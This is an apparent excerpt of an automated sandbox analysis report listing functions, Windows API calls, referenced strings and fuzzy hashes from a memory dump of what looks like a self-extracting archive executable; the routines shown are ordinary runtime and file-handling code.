Instruction Fuzzy Hash: 8B3126305457856FE7309F24CC45BDAFBD8FB04324F100B5AF5A5962D0E3B89944CB95

Function 00BEABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00BEABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 00BEABF9

Part of subcall function 00BE1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BDC116,00000000,.exe,?,?,00000800,?,?,?,00BE8E3C), ref: 00BE1FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00BEABE9

Strings

EDIT, xrefs: 00BEABCD, 00BEABD8, 00BEABE5

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 12d78106d343dc2b10d80f39238cf1fe65fbd6c25aed3bf536a0c80790213537
Instruction ID: 5eeecdab786c916c5123317c2fc7bcfc00880b4dbb0c3b6d6e7ae5198f2146fc
Opcode Fuzzy Hash: 12d78106d343dc2b10d80f39238cf1fe65fbd6c25aed3bf536a0c80790213537
Instruction Fuzzy Hash: 17F0827660066876DB2056259C09F9F76AC9B46B41F484051BA05A21C0D760EA41C5F6

Function 00BEAC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BE081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BE0836
Part of subcall function 00BE081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BDF2D8,Crypt32.dll,00000000,00BDF35C,?,?,00BDF33E,?,?,?), ref: 00BE0858

OleInitialize.OLE32(00000000), ref: 00BEAC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00BEAC66
SHGetMalloc.SHELL32(00C18438), ref: 00BEAC70

Strings

riched20.dll, xrefs: 00BEAC1E

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: deee41c6bc965bf9b6bc7309b7106a06a0b5e5fffe14385aca050a7bd5850ab8
Instruction ID: 330f14e51aa96b9563c57b740a86f79b9cee6fbfeb6e796dfcc42ec4475509ca
Opcode Fuzzy Hash: deee41c6bc965bf9b6bc7309b7106a06a0b5e5fffe14385aca050a7bd5850ab8
Instruction Fuzzy Hash: 13F036B1D00249ABCB10AFA9D949ADFFFFCEF84700F004156E555E2251DBB45645CFA1

Function 00BEDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00BEDBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00BEDC30

Strings

sfxcmd, xrefs: 00BEDBEF
sfxpar, xrefs: 00BEDC2B

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 1b4ff2ef81e465a3af917905cb9c717dc60396f829a10d8a182f4361e3865232
Instruction ID: e29553c8908fa43f1bea754bf75f544c92e264610dd35bc0a15f6930fa3281df
Opcode Fuzzy Hash: 1b4ff2ef81e465a3af917905cb9c717dc60396f829a10d8a182f4361e3865232
Instruction Fuzzy Hash: 31F0EC72504264A7CF202F968C06BFF37ECEF087C1B140491BD8595291D7F08980DAB0

Function 00BD9785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00BD9795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00BD97AD
GetLastError.KERNEL32 ref: 00BD97DF
GetLastError.KERNEL32 ref: 00BD97FE

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 001c1a832398f0f81354a55fa9b099638e854dfe1eff16c0b7ff89028dceac43
Instruction ID: 85b50f279f227f70e415c5af5cc3a7e17f21aac461d580e2c380953cb0d958e1
Opcode Fuzzy Hash: 001c1a832398f0f81354a55fa9b099638e854dfe1eff16c0b7ff89028dceac43
Instruction Fuzzy Hash: 3D11C230910204EBDF205F64C84476DB7E8FB02BA4F1085ABF81A95390F7758E44EB61

Function 00BFAD34 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00BDD710,00000000,00000000,?,00BFACDB,00BDD710,00000000,00000000,00000000,?,00BFAED8,00000006,FlsSetValue), ref: 00BFAD66
GetLastError.KERNEL32(?,00BFACDB,00BDD710,00000000,00000000,00000000,?,00BFAED8,00000006,FlsSetValue,00C07970,FlsSetValue,00000000,00000364,?,00BF98B7), ref: 00BFAD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BFACDB,00BDD710,00000000,00000000,00000000,?,00BFAED8,00000006,FlsSetValue,00C07970,FlsSetValue,00000000), ref: 00BFAD80

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: b5d9920fcfcb53d31bcc403c9279aaf1e5c15321451cc2d3419d991bf201953e
Instruction ID: 94e06753727e53362def964e668e4be6229d873cd59a11b1f69c0aae40b9d50f
Opcode Fuzzy Hash: b5d9920fcfcb53d31bcc403c9279aaf1e5c15321451cc2d3419d991bf201953e
Instruction Fuzzy Hash: 0401FC7E61123AABC7254F689C84B6BBBDCEF057A27110670FA0AD3561D720D905C6E1

Function 00BD9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00BDD343,00000001,?,?,?,00000000,00BE551D,?,?,?), ref: 00BD9F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00BE551D,?,?,?,?,?,00BE4FC7,?), ref: 00BD9FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00BDD343,00000001,?,?), ref: 00BDA011

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: baeb3fb42793af7c99a452658291ff43606dcbcf09052294941814d31751898a
Instruction ID: 8d2201a14ed2c33487052271bcd64103da1abdf266c41bb49ed8f011e98b0101
Opcode Fuzzy Hash: baeb3fb42793af7c99a452658291ff43606dcbcf09052294941814d31751898a
Instruction Fuzzy Hash: F631CE71208345AFDB14CF20D858BAEB7E9EF84714F04495AF9819B390D775AE48CBA2

Function 00BDA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00BDC27E: _wcslen.LIBCMT ref: 00BDC284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA30C
GetLastError.KERNEL32(?,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA329

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: ab3fb12a2c4930e9229645f2c92d10ba41ce2c5a3c945c646d67f288f84ec4ae
Instruction ID: e168f3a9dbd7a56998fb90dceed6d309a8bcb16b76b0d8df2c9ed364d88328e4
Opcode Fuzzy Hash: ab3fb12a2c4930e9229645f2c92d10ba41ce2c5a3c945c646d67f288f84ec4ae
Instruction Fuzzy Hash: 4C01B131200250AAEF21AB754C49BEDB6CDDF0A794F044497F902E6381F768CB81C6BA

Function 00BFB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00BFB8B8

Strings

, xrefs: 00BFB8FD

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: ff01c3ed6594428685f73b2de2001c6942606548ee5f1beeebe307911b3ffcd9
Instruction ID: 514f797f0bd3341be92b3cf57143b549b9f2559a6768d315b3da95f09e2195c7
Opcode Fuzzy Hash: ff01c3ed6594428685f73b2de2001c6942606548ee5f1beeebe307911b3ffcd9
Instruction Fuzzy Hash: DE41F87050428C9ADF218E68CC84FFABBEDDB45304F1444EDE79A87142D375AA49CF60

Function 00BFAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00BFAFDD

Strings

LCMapStringEx, xrefs: 00BFAF7D, 00BFAF87

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 72e99152131bf4e720274ed949169bfc9c88dc6e5d0ca0befea48c6816e5b295
Instruction ID: 76abc2ae849a2cc4de9a72f02242bd7ae21371d6755be633905d3905eef62987
Opcode Fuzzy Hash: 72e99152131bf4e720274ed949169bfc9c88dc6e5d0ca0befea48c6816e5b295
Instruction Fuzzy Hash: EA01087254421DBBCF069F90DC06EEE7FA6EF08750F054294FE1866161CA329A31EB91

Function 00BFAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00BFA56F), ref: 00BFAF55

Strings

InitializeCriticalSectionEx, xrefs: 00BFAF1B, 00BFAF25

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 35736730ba1c10a557c68adb768493b27a6a75fa8e312d5f7f9fbc6cab15faee
Instruction ID: 7b1fdf182cec26f40b5eb157401d305f1b7eb45ec19cf9e2e3a813d02e5bf6ef
Opcode Fuzzy Hash: 35736730ba1c10a557c68adb768493b27a6a75fa8e312d5f7f9fbc6cab15faee
Instruction Fuzzy Hash: 4BF0E971A4521CBFCF0A6F55CC06EAEBFA5EF08711B4141A4FD089B260DA315E10D7D5

Function 00BFADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00BFADEE

Strings

FlsAlloc, xrefs: 00BFADC0, 00BFADCA

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: b70a8051faee901c6a3a9f1d04f7290389e104624bcdf3600e02b8d141e30ddd
Instruction ID: 1521297240ea555c54227954f26c331f066bf2a02d14cf194740791f7dd2864d
Opcode Fuzzy Hash: b70a8051faee901c6a3a9f1d04f7290389e104624bcdf3600e02b8d141e30ddd
Instruction Fuzzy Hash: E4E0E571A8521C7BC609AB65DC06F7EBB94DB48721B0202F9F90997280CE706E10C6D6

Function 00BFBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00BFB7BB: GetOEMCP.KERNEL32(00000000,?,?,00BFBA44,?), ref: 00BFB7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00BFBA89,?,00000000), ref: 00BFBC64
GetCPInfo.KERNEL32(00000000,00BFBA89,?,?,?,00BFBA89,?,00000000), ref: 00BFBC77

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 5e18913a8f744605614355c06f0ee11b8f8e0fc6bff3ab9ccd8878f7eaa631ca
Instruction ID: 0c713320dff683ddf0415633239aa6fd0a9739d48bb938ea04ea4f38bb8b213b
Opcode Fuzzy Hash: 5e18913a8f744605614355c06f0ee11b8f8e0fc6bff3ab9ccd8878f7eaa631ca
Instruction Fuzzy Hash: 32515578A0024D9EDB249F35C881EBBBBE4EF41300F2844FED6968B651D7349949CB91

Function 00BD9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00BD9A50,?,?,00000000,?,?,00BD8CBC,?), ref: 00BD9BAB
GetLastError.KERNEL32(?,00000000,00BD8411,-00009570,00000000,000007F3), ref: 00BD9BB6

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: b2408948a013de5d5855771925c87cc8d281e20bb8660c5fd8f2618371f0e3d0
Instruction ID: 1a4da5a84e363061713599742bf1e59d2a823418135d5ea0c16cf08862cf64eb
Opcode Fuzzy Hash: b2408948a013de5d5855771925c87cc8d281e20bb8660c5fd8f2618371f0e3d0
Instruction Fuzzy Hash: 8B41DB316043418FDB24DF25E58496AF7E9FBD4320F168AAFE89583360F770ED448A91

Function 00BFBA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00BF97E5: GetLastError.KERNEL32(?,00C11030,00BF4674,00C11030,?,?,00BF3F73,00000050,?,00C11030,00000200), ref: 00BF97E9
Part of subcall function 00BF97E5: _free.LIBCMT ref: 00BF981C
Part of subcall function 00BF97E5: SetLastError.KERNEL32(00000000,?,00C11030,00000200), ref: 00BF985D
Part of subcall function 00BF97E5: _abort.LIBCMT ref: 00BF9863

Part of subcall function 00BFBB4E: _abort.LIBCMT ref: 00BFBB80
Part of subcall function 00BFBB4E: _free.LIBCMT ref: 00BFBBB4

Part of subcall function 00BFB7BB: GetOEMCP.KERNEL32(00000000,?,?,00BFBA44,?), ref: 00BFB7E6

_free.LIBCMT ref: 00BFBA9F
_free.LIBCMT ref: 00BFBAD5

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 69a68f1e3a31ced0dd834c86d1f7df1858d1b9d4ba80e45f30d47ebb9d4b5805
Instruction ID: ded22f7773f20c36befd34a244bac315e1c06a1be8c592898242e5afe7154ce4
Opcode Fuzzy Hash: 69a68f1e3a31ced0dd834c86d1f7df1858d1b9d4ba80e45f30d47ebb9d4b5805
Instruction Fuzzy Hash: 5A317C3190420DAFDB14EBA8D481FBDB7E5EF41320F2540D9EA149B2A2EF329D48DB50

Function 00BD1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BD1E55

Part of subcall function 00BD3BBA: __EH_prolog.LIBCMT ref: 00BD3BBF

_wcslen.LIBCMT ref: 00BD1EFD

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 8d27c3746c5dbd3a0128af4072fe88618916ffa92923e3a8488b4e16c20c4332
Instruction ID: d658ef1c17ab8b5848a2c5f95465840fc089a64ce60f162eac7731b3d84f6175
Opcode Fuzzy Hash: 8d27c3746c5dbd3a0128af4072fe88618916ffa92923e3a8488b4e16c20c4332
Instruction Fuzzy Hash: D6314A71905209AFCF11DFA9C945AEEFBF6EF08300F2008AAE845A7351D7325E00DB60

Function 00BD9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00BD73BC,?,?,?,00000000), ref: 00BD9DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00BD9E70

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 992914f1be81152ec6bd6b833da5dba2a825e2b4ac1f6f29e9dc79abf37d7931
Instruction ID: e7615d6b0c3a7882acbfaccc7e4a98e26fb2609f51c9e8b209feee58826dd8c3
Opcode Fuzzy Hash: 992914f1be81152ec6bd6b833da5dba2a825e2b4ac1f6f29e9dc79abf37d7931
Instruction Fuzzy Hash: 2F21D031249285ABC714DF35C891AABFBE8EF55704F0849AEF4C587281E339E90CDB61

Function 00BD966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

